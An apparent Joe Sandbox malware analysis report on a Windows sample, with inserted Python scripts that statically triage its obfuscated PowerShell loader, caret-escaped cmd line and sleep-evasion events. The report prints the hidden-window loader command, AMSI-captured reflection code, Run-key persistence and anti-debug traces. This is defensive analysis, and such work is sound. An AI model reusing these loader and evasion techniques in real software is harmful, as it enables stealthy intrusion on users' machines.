        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdba source: powershell.exe, 00000001.00000002.2060432087.0000000007705000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara match | File source: 00000001.00000002.2067336932.000000000BC43000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Harder171 $Dodonean $Manchette192), (Aarskarakter @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Replikskiftet = [AppDomain]::CurrentDomain.GetAssemblies(
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Winiest)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Editioners, $false).DefineType($Breastwood, $Ramo
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        Source: C:\Users\user\Desktop\160420241245287.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
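The fragments captured above can be triaged without running any of them: the cmd.exe command line is caret-escaped, the PowerShell loader never writes the name of the command it invokes but slices it out of Randrusianeren.Unf at offset 75194, and the two AMSI excerpts are the reflection primitives that build a native-call delegate in memory. The script below is an added example and not part of this report or of Joe Sandbox. The command lines and AMSI text are copied from the report; the content of Randrusianeren.Unf is not on the page, so the resolver runs against a constructed stand-in in which "iex" at the loader offset is an assumption, not an observation.

```python
"""
Static triage of the obfuscated fragments the sandbox captured from this sample:
the caret-escaped cmd.exe command line, the PowerShell SubString() loader, and
the AMSI-logged reflection fragments. Added example for this report, not Joe
Sandbox code. Command lines and AMSI fragments are copied from the report; the
content of Randrusianeren.Unf is NOT on the page and is constructed below.
"""
import re

# Process-creation command lines as captured in the report.
POWERSHELL_CMDLINE = (
    r'"powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content '
    r"'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';"
    r'$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"'
)
CMD_CMDLINE = r'"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"'

# AMSI fragments as captured (the report truncates them; so does this list).
AMSI_FRAGMENTS = [
    "GetDelegateForFunctionPointer((Harder171 $Dodonean $Manchette192), "
    "(Aarskarakter @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
    "$global:Replikskiftet = [AppDomain]::CurrentDomain.GetAssemblies(",
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Winiest)), "
    "[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("
    "$Editioners, $false).DefineType($Breastwood, $Ramo",
]

# $a = Get-Content 'file'; $b = $a.SubString(off,len); .$b($a)
# The invoked command name is never spelled out; it is sliced from the payload.
_SUBSTRING_LOADER = re.compile(
    r"\$(?P<content>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;\s*"
    r"\$(?P<cmd>\w+)\s*=\s*\$(?P=content)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;\s*"
    r"\.\$(?P=cmd)\(\$(?P=content)\)"
)

# Reflection primitives that together build a native-call delegate in memory.
REFLECTION_INDICATORS = {
    "delegate_from_pointer": r"GetDelegateForFunctionPointer\s*\(",
    "dynamic_assembly": r"DefineDynamicAssembly\s*\(",
    "dynamic_type": r"DefineDynamicModule\(.*?\)\.DefineType\(",
    "run_only_assembly": r"AssemblyBuilderAccess\]::Run\b",
    "assembly_enumeration": r"\[AppDomain\]::CurrentDomain\.GetAssemblies\(",
}


def parse_substring_loader(cmdline):
    """Return (payload_path, offset, length) for the SubString loader pattern, else None."""
    m = _SUBSTRING_LOADER.search(cmdline)
    if m is None:
        return None
    return m["path"], int(m["off"]), int(m["len"])


def resolve_invoked_command(cmdline, payload_text):
    """Slice the command name the loader would invoke, without executing anything.
    Assumes the payload is a single line, so Get-Content yields one string."""
    parsed = parse_substring_loader(cmdline)
    if parsed is None:
        return None
    _, off, length = parsed
    return payload_text[off:off + length]


def strip_cmd_carets(cmdline):
    """Normalise cmd.exe caret escaping for hunting: '^^' -> '^', '^X' -> 'X'.
    This is a string normaliser, not an emulation of the cmd.exe parser."""
    out, i = [], 0
    while i < len(cmdline):
        if cmdline[i] == "^" and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)


def reflection_indicators(fragment):
    """Names of the reflection primitives present in one AMSI fragment."""
    return sorted(n for n, p in REFLECTION_INDICATORS.items() if re.search(p, fragment))


def constructed_payload(offset, marker="iex", total_len=80_000):
    """Stand-in for Randrusianeren.Unf. The real file is not on the page; 'iex'
    at the loader offset is an ASSUMPTION used only to exercise the resolver."""
    body = ["x"] * total_len
    body[offset:offset + len(marker)] = list(marker)
    return "".join(body)


if __name__ == "__main__":
    path, off, length = parse_substring_loader(POWERSHELL_CMDLINE)
    print("payload:", path, "offset:", off, "length:", length)
    print("invoked (constructed payload):",
          resolve_invoked_command(POWERSHELL_CMDLINE, constructed_payload(off)))
    print("cmd normalised:", strip_cmd_carets(CMD_CMDLINE))
    for frag in AMSI_FRAGMENTS:
        print(reflection_indicators(frag))
```

The point of resolving the SubString() slice statically is that a string match on "IEX" or "Invoke-Expression" in the command line will never fire for this loader; the offset and length have to be read out and applied to the payload file, which is why the payload path is returned alongside them. The caret normaliser is the same idea for the cmd.exe child: match on the normalised form, not the raw one.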
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress (0_2_00406254)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BD1187 push eax; retf 0070h (1_2_04BD1192)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BD1177 push eax; retf 0070h (1_2_04BD1182)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BD116D push eax; retf 0070h (1_2_04BD1172)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030D225F pushad ; ret (12_2_030D27F9)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030D27FA pushad ; ret (12_2_030D27F9)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031009AD push ecx; mov dword ptr [esp], ecx (12_2_031009B6)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030D283D push eax; iretd (12_2_030D2858)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030D1368 push eax; iretd (12_2_030D1369)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02838208 push ds; retf (12_2_0283820A)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02850268 push edi; iretd (12_2_02850278)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02850270 push edi; iretd (12_2_02850278)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0284039F push ss; ret (12_2_028403C4)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_028443C0 push edi; retf (12_2_028443CC)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_028403D1 push E16F236Ah; retn 0031h (12_2_028403D6)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02850046 push FFFFFF8Ch; iretd (12_2_02850077)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_028421B0 push esi; retf (12_2_028421BB)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0285067E push ecx; ret (12_2_028506AE)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0284CBAE push eax; retf (12_2_0284CBB1)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_02844FC8 pushfd ; retf (12_2_02844FDD)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0284B681 push ebp; ret (12_2_0284B68C)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Untapestried.exe
        Source: C:\Users\user\Desktop\160420241245287.exe | File created: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll
        Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lgplante (2 entries)
        Source: C:\Users\user\Desktop\160420241245287.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (88 entries)
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Process information set: NOOPENFILEERRORBOX (15 entries)
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX|NOOPENFILEERRORBOX (5 entries)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0314096E rdtsc (12_2_0314096E)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7881
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1929
        Source: C:\Windows\SysWOW64\cmd.exe | Window / User API: threadDelayed 6569
        Source: C:\Windows\SysWOW64\cmd.exe | Window / User API: threadDelayed 3402
        Source: C:\Users\user\Desktop\160420241245287.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll
        Source: C:\Windows\SysWOW64\cmd.exe | API coverage: 2.3 %
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 | Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 | Thread sleep count: 6569 > 30
        Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 | Thread sleep time: -13138000s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 | Thread sleep count: 3402 > 30
        Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 | Thread sleep time: -6804000s >= -30000s
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe TID: 1740 | Thread sleep time: -35000s >= -30000s
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
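The sandbox evaluates each sleep against a fixed per-call threshold (the -30000s in the lines above). cmd.exe TID 8168 never crosses it: 6569 and then 3402 calls of 13138000/6569 = 2000 each, i.e. a 2 s sleep repeated nearly ten thousand times, which only adds up to a multi-hour delay when the events are rolled up per thread. The script below does that roll-up. It is an added example, not Joe Sandbox code; the lines are copied from the report, and treating the values as milliseconds (the report suffixes them with "s", but 2000 s per call would be 152 days of sleeping) is my inference, not something the report states.

```python
"""
Cumulative sleep accounting for the per-thread delay events in this report.
Added example, not Joe Sandbox code. The sandbox flags each call against a
30 s threshold; this rolls the calls up per thread so that many short sleeps
show up as the long delay they add up to. Lines are copied from the report;
treating the values as milliseconds is an assumption (the report suffixes
them with 's', but 13138000 / 6569 = 2000 per call only makes sense as ms).
"""
import re
from collections import defaultdict

REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440 | Thread sleep time: -6456360425798339s >= -30000s",
    r"Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 | Thread sleep count: 6569 > 30",
    r"Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 | Thread sleep time: -13138000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 | Thread sleep count: 3402 > 30",
    r"Source: C:\Windows\SysWOW64\cmd.exe TID: 8168 | Thread sleep time: -6804000s >= -30000s",
    r"Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe TID: 1740 | Thread sleep time: -35000s >= -30000s",
]

SINGLE_SLEEP_THRESHOLD_MS = 30_000          # the report's own per-call threshold
MS_PER_YEAR = 365 * 24 * 3600 * 1000

# Tolerates both the fused form ("TID: 7440Thread sleep") and a separated one.
_SLEEP_EVENT = re.compile(
    r"Source: (?P<proc>.+?) TID: (?P<tid>\d+)\D*?Thread sleep (?P<kind>count|time): -?(?P<value>\d+)"
)


def parse_sleep_events(lines):
    """(process basename, tid, 'count'|'time', magnitude) for each matching line."""
    events = []
    for line in lines:
        m = _SLEEP_EVENT.search(line)
        if m:
            events.append((m["proc"].rsplit("\\", 1)[-1], int(m["tid"]), m["kind"], int(m["value"])))
    return events


def classify(entry):
    """Verdict for one thread's aggregated sleep behaviour."""
    if entry["total_ms"] >= MS_PER_YEAR:
        return "unbounded-sleep"      # effectively never wakes up inside a sandbox
    if entry["max_single_ms"] >= SINGLE_SLEEP_THRESHOLD_MS:
        return "long-sleep"           # what the per-call check already catches
    if entry["calls"] > 30 and entry["total_ms"] >= SINGLE_SLEEP_THRESHOLD_MS:
        return "sleep-loop"           # short sleeps that add up past the threshold
    return "benign"


def summarize_sleeps(lines):
    """Per (process, tid): total calls, cumulative ms, largest single sleep, verdict.
    A 'count' line applies to the 'time' line that follows it for the same thread;
    a 'time' line with no preceding count is a single call."""
    threads = defaultdict(lambda: {"calls": 0, "total_ms": 0, "max_single_ms": 0})
    pending_count = {}
    for proc, tid, kind, value in parse_sleep_events(lines):
        key = (proc, tid)
        if kind == "count":
            pending_count[key] = value
            continue
        calls = pending_count.pop(key, 1)
        t = threads[key]
        t["calls"] += calls
        t["total_ms"] += value
        t["max_single_ms"] = max(t["max_single_ms"], value // calls)
    for t in threads.values():
        t["verdict"] = classify(t)
    return dict(threads)


if __name__ == "__main__":
    for (proc, tid), t in summarize_sleeps(REPORT_LINES).items():
        print(f"{proc} tid={tid}: {t['calls']} calls, {t['total_ms'] / 1000:.0f} s total, "
              f"max single {t['max_single_ms'] / 1000:.0f} s -> {t['verdict']}")
```

Run stand-alone it prints one line per thread: the cmd.exe thread comes out as a sleep-loop of 9971 calls totalling 19942 s, the powershell.exe thread as an unbounded sleep (the magnitude is Int64-sized and will never elapse), and the bvvgQqxLmFZr.exe thread as the single 35 s sleep the per-call rule already flags.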
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose (0_2_00405772)
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_0040622D FindFirstFileW,FindClose (0_2_0040622D)
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_00402770 FindFirstFileW (0_2_00402770)
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0284B880 FindFirstFileW,FindNextFileW,FindClose (12_2_0284B880)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
        Source: 160420241245287.exe, 00000000.00000002.1650258506.0000000000750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-1
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW bw
        Source: Untapestried.exe, 00000007.00000003.2058238428.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2058348263.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2158641488.0000000004771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
        Source: Untapestried.exe, 00000007.00000003.2058238428.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2058348263.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2158641488.0000000004771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
        Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887063511.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: firefox.exe, 0000000E.00000002.2438974252.000001EC1020C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
        Source: C:\Users\user\Desktop\160420241245287.exeAPI call chain: ExitProcess graph end nodegraph_0-3754
        Source: C:\Users\user\Desktop\160420241245287.exeAPI call chain: ExitProcess graph end nodegraph_0-3760
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Thread information set: HideFromDebugger
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Process queried: DebugPort
        Source: C:\Windows\SysWOW64\cmd.exe | Process queried: DebugPort
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0314096E rdtsc
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0327D508 LdrInitializeThunk,LdrInitializeThunk
        Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03120310 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313A30B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FC310 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D8324 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D8324 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0318035C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0318035C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031A8350 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031CA352 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03182349 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D634F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031A437C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FE388 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030F8397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0312438F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031AE3DB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031AE3DB mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031A43D4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0310A3C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031083C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031BC3CD mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031863C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311E3F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031363FF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031103E9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030F823B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D625D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03106259 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031BA250 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03188243 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03188243 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FA250 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030F826B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031B0274 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03104260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0313E284 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03180283 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031102A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031962A0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D62D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031102E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031AA118 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031AA118 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C0115 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03130124 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03198158 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03106154 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FC156 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03194144 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03194144 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D4164 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0318019F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03140185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031BC188 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FA197 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031A4180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0317E1D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C61C3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031301F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031D61E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03184000 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03196030 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FA020 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FC020 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03102050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03186050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0312C073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0310208A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C60B8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031C60B8 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030F80A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031980A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031820DE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031420F0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FA0E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031860E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_031080E9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_030FC0F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_03100710 mov eax, dword ptr fs:[00000030h]
